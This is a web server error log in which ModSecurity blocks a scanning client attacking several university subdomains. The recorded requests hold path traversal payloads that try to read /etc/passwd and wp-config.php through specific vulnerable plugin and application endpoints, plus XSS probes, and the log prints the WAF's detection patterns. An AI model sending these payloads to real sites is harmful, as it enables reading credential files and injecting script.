[Tue Aug 29 11:45:49.408732 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "ZO13-cCo-f0AAAhZRgwAAAAG"]
[Tue Aug 29 11:45:49.409610 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:obj_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:obj_name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13-cCo-f0AAAi5uA0AAAAS"]
[Tue Aug 29 11:45:50.399452 2023] [:error] [pid 2232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:eeFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:eeFile: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/simple-file-list/includes/ee-downloader.php"] [unique_id "ZO13-sCo-f0AAAi4ND0AAAAQ"]
[Tue Aug 29 11:45:50.495794 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:eeFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:eeFile: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/simple-file-list/includes/ee-downloader.php"] [unique_id "ZO13-sCo-f0AAAhxwrkAAAAv"]
[Tue Aug 29 11:45:51.365293 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:Path: Classes/../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/XMII/Catalog"] [unique_id "ZO13-8Co-f0AAAhzvecAAAAx"]
[Tue Aug 29 11:45:51.416503 2023] [:error] [pid 2223] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:Path: Classes/../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/XMII/Catalog"] [unique_id "ZO13-8Co-f0AAAiv-y0AAAAJ"]
[Tue Aug 29 11:45:51.440663 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:Path: Classes/../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/XMII/Catalog"] [unique_id "ZO13-8Co-f0AAAhui1wAAAAr"]
[Tue Aug 29 11:45:51.443193 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:Path: Classes/../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/XMII/Catalog"] [unique_id "ZO13-8Co-f0AAAfEB4QAAAAO"]
[Tue Aug 29 11:45:51.456946 2023] [:error] [pid 2223] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:Path: Classes/../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/XMII/Catalog"] [unique_id "ZO13-8Co-f0AAAiv-y8AAAAJ"]
[Tue Aug 29 11:45:52.666546 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:Path: Classes/../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/XMII/Catalog"] [unique_id "ZO14AMCo-f0AAAhlz8YAAAAi"]
[Tue Aug 29 11:45:56.367347 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "ZO14BMCo-f0AAAhT31YAAAAD"]
[Tue Aug 29 11:45:56.380258 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "ZO14BMCo-f0AAAhgoLYAAAAb"]
[Tue Aug 29 11:45:56.393664 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "ZO14BMCo-f0AAAhBSEQAAAAX"]
[Tue Aug 29 11:45:56.412017 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "ZO14BMCo-f0AAAhrqMkAAAAo"]
[Tue Aug 29 11:45:56.436648 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "ZO14BMCo-f0AAARphPgAAAAU"]
[Tue Aug 29 11:45:57.395426 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "ZO14BcCo-f0AAAipS3kAAAAF"]
[Tue Aug 29 11:46:01.374371 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/SolarWinds/InformationService/v3/Json/Query"] [unique_id "ZO14CcCo-f0AAAhzvfkAAAAx"]
[Tue Aug 29 11:46:01.379460 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/SolarWinds/InformationService/v3/Json/Query"] [unique_id "ZO14CcCo-f0AAAib5wQAAAAA"]
[Tue Aug 29 11:46:01.379600 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/SolarWinds/InformationService/v3/Json/Query"] [unique_id "ZO14CcCo-f0AAAhlz@QAAAAi"]
[Tue Aug 29 11:46:01.387920 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/SolarWinds/InformationService/v3/Json/Query"] [unique_id "ZO14CcCo-f0AAAdxUocAAAAC"]
[Tue Aug 29 11:46:01.404777 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/SolarWinds/InformationService/v3/Json/Query"] [unique_id "ZO14CcCo-f0AAAhzvfoAAAAx"]
[Tue Aug 29 11:46:01.406005 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:where: place\\x22><svg onload=confirm(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/7/0/33/1d/www.citysearch.com/search"] [unique_id "ZO14CcCo-f0AAAhgoL0AAAAb"]
[Tue Aug 29 11:46:01.410398 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: \\x22><svg o found within ARGS:where: place\\x22><svg onload=confirm(document.domain)>"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "ft.unla.ac.id"] [uri "/7/0/33/1d/www.citysearch.com/search"] [unique_id "ZO14CcCo-f0AAAfSWn0AAAAB"]
[Tue Aug 29 11:46:01.410564 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:where: place\\x22><svg onload=confirm(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/7/0/33/1d/www.citysearch.com/search"] [unique_id "ZO14CcCo-f0AAAi5uBYAAAAS"]
[Tue Aug 29 11:46:01.425750 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:where: place\\x22><svg onload=confirm(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/7/0/33/1d/www.citysearch.com/search"] [unique_id "ZO14CcCo-f0AAAhgoL4AAAAb"]
[Tue Aug 29 11:46:02.365105 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/cgiServer.exx"] [unique_id "ZO14CsCo-f0AAAi-Q9kAAAAH"]
[Tue Aug 29 11:46:02.383601 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:where: place\\x22><svg onload=confirm(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/7/0/33/1d/www.citysearch.com/search"] [unique_id "ZO14CsCo-f0AAAi2yAgAAAAN"]
[Tue Aug 29 11:46:02.388114 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/cgiServer.exx"] [unique_id "ZO14CsCo-f0AAAi-Q9oAAAAH"]
[Tue Aug 29 11:46:02.388647 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/cgiServer.exx"] [unique_id "ZO14CsCo-f0AAAfbk0wAAAAZ"]
[Tue Aug 29 11:46:02.389156 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cgi-bin/cgiServer.exx"] [unique_id "ZO14CsCo-f0AAAi5uBkAAAAS"]
[Tue Aug 29 11:46:02.411056 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/InformationService/v3/Json/Query"] [unique_id "ZO14CsCo-f0AAAipS4YAAAAF"]
[Tue Aug 29 11:46:02.419293 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/cgiServer.exx"] [unique_id "ZO14CsCo-f0AAAhlz@gAAAAi"]
[Tue Aug 29 11:46:02.426873 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/InformationService/v3/Json/Query"] [unique_id "ZO14CsCo-f0AAAhZRi4AAAAG"]
[Tue Aug 29 11:46:02.432874 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/InformationService/v3/Json/Query"] [unique_id "ZO14CsCo-f0AAAipS4cAAAAF"]
[Tue Aug 29 11:46:02.434348 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/InformationService/v3/Json/Query"] [unique_id "ZO14CsCo-f0AAAib5wkAAAAA"]
[Tue Aug 29 11:46:02.444862 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:where: place\\x22><svg onload=confirm(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/7/0/33/1d/www.citysearch.com/search"] [unique_id "ZO14CsCo-f0AAAhtjh8AAAAq"]
